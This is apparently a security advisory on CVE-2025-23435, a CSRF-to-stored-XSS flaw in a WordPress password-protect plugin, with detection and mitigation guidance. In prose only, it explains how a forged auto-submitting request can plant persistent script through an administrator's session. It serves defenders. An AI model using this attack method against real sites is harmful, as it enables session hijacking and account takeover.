CVE-2025-23435 Overview
CVE-2025-23435 is a Cross-Site Request Forgery (CSRF) vulnerability in the marcucci Password Protect Plugin for WordPress that chains into Stored Cross-Site Scripting (XSS). The flaw affects all plugin versions up to and including 0.8.1.0. An attacker who tricks an authenticated administrator into visiting a crafted page can submit forged requests that persist malicious JavaScript into plugin-managed content. The injected script later executes in the browsers of site visitors and administrators. The issue is tracked under CWE-352 and was published to NVD on January 16, 2025.
Critical Impact
Successful exploitation chains CSRF with Stored XSS, enabling session hijacking, administrative account takeover, and persistent malicious payload delivery to WordPress site visitors.
Affected Products
- marcucci Password Protect Plugin for WordPress versions through 0.8.1.0
- WordPress installations with the password-protect-plugin-for-wordpress plugin enabled
- Sites where administrators may interact with untrusted external content while authenticated
Discovery Timeline
- 2025-01-16 - CVE-2025-23435 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-23435
Vulnerability Analysis
The Password Protect Plugin for WordPress fails to validate request authenticity on state-changing operations. WordPress provides a nonce mechanism through wp_nonce_field() and check_admin_referer() to bind requests to authenticated user sessions. The vulnerable plugin omits or incorrectly verifies these tokens on configuration handlers exposed to administrators.
The defect allows a remote attacker to forge HTTP requests that the victim's browser submits with authenticated cookies. Because the plugin also fails to sanitize stored input, attacker-controlled JavaScript persists in the database. Each subsequent page render injects the payload into the DOM, producing Stored XSS. The compound flaw elevates a one-click social engineering trigger into persistent site-wide script execution.
Root Cause
The root cause is missing CSRF token validation on plugin administrative endpoints, combined with insufficient output encoding of stored values. WordPress hooks such as admin_post_* and admin-ajax.php actions require explicit nonce verification, which the affected versions do not enforce consistently.
Attack Vector
Exploitation requires user interaction, reflected by the UI:R component of the CVSS vector. An attacker hosts a malicious page containing an auto-submitting form or fetch request targeting the plugin's settings endpoint. When an authenticated WordPress administrator visits the page, the browser issues the forged request under the admin's session. The payload is stored and rendered to subsequent visitors, achieving a scope change (S:C) from the WordPress admin context to all site users.
The vulnerability mechanism is described in the Patchstack WordPress Vulnerability advisory. No public proof-of-concept code is currently available.
Detection Methods for CVE-2025-23435
Indicators of Compromise
- Unexpected <script> tags, event handlers, or obfuscated JavaScript stored in plugin configuration tables within the WordPress database.
- WordPress access logs showing POST requests to plugin admin endpoints originating with Referer headers from external, untrusted domains.
- New or modified administrator accounts created shortly after an admin browsed external content.
- Outbound browser connections from site visitors to attacker-controlled domains following page loads.
Detection Strategies
- Audit the wp_options table and plugin-specific tables for HTML or JavaScript content where plain text is expected.
- Monitor web server logs for state-changing requests to password-protect-plugin-for-wordpress endpoints lacking valid _wpnonce parameters.
- Deploy a Web Application Firewall (WAF) rule to flag cross-origin POST requests targeting WordPress /wp-admin/ paths.
Monitoring Recommendations
- Enable WordPress audit logging to capture plugin setting changes and correlate with administrator session activity.
- Implement Content Security Policy (CSP) reporting to detect unexpected inline script execution on public pages.
- Track plugin version inventory across managed WordPress fleets to identify hosts running 0.8.1.0 or earlier.
How to Mitigate CVE-2025-23435
Immediate Actions Required
- Identify all WordPress sites running the Password Protect Plugin for WordPress at version 0.8.1.0 or earlier and prioritize remediation.
- Update the plugin to a version newer than 0.8.1.0 once the vendor publishes a fix; consult the Patchstack advisory for current status.
- Review plugin configuration values for injected scripts and remove any unauthorized content.
- Rotate administrator credentials and invalidate active sessions if compromise is suspected.
Patch Information
At the time of publication, the affected version range is "from n/a through <= 0.8.1.0." Administrators should monitor the WordPress plugin repository and the Patchstack database for an updated release. If no patched version is available, deactivate and remove the plugin until the vendor addresses the issue.
Workarounds
- Deactivate the Password Protect Plugin for WordPress until a patched version is installed.
- Restrict WordPress administrator access to dedicated browsers or sessions that do not browse arbitrary external content.
- Deploy a WAF rule that blocks cross-origin requests to plugin administrative endpoints lacking valid WordPress nonces.
- Enforce a strict Content Security Policy that disallows inline scripts to limit the impact of stored XSS payloads.
# Example: disable the plugin via WP-CLI pending a vendor fix
wp plugin deactivate password-protect-plugin-for-wordpress
wp plugin delete password-protect-plugin-for-wordpress
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
